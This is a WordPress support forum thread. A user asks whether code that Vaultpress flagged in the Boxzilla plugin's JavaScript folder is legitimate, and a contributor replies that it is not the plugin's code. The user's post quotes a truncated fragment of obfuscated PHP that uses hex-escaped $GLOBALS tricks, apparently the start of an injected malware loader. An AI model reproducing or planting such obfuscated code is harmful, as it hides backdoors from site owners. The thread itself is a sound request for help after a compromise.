Jetpack Vaultpress scan detects suspicious code

  • Resolved cloudbuster61

    (@cloudbuster61)


    7 years, 9 months ago

    This code is throwing a Generic.Hidden.Code.2 warning in Vaultpress
    Is it valid?
    Google also started throwing up a malicious warning

    /wp-content/plugins/boxzilla/assets/js

    $ld907 = 286;$GLOBALS[‘eb99d’] = Array();global $eb99d;$eb99d = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53”}[‘g36407ed’] = “\x32\x77\x65\x51\x67\x5f\x43\x2b\x23\x62\x74\x75\x21\x48\x5a\x7a\x27\x4d\x4b\x24\x5d\x2d\x6a\x6b\x47\x4f\x56\x7e\x2a\x9\x53\x66\x6d\x46\x22\x45

Viewing 1 replies (of 1 total)
  • Plugin Contributor Lap

    (@lapzor)

    7 years, 9 months ago

    That does not seem like code from our plugin. Seems to be added by someone or something else.

    Does it mention in what file the code is added? I only see the folder name above.

    Here is the original code: https://github.com/ibericode/boxzilla-wp/tree/master/assets/js

    As you can see the code you shared is not found when I do a code search on Boxzilla.

    Hope that helps. If you have any questions, please let us know!

Viewing 1 replies (of 1 total)

The topic ‘Jetpack Vaultpress scan detects suspicious code’ is closed to new replies.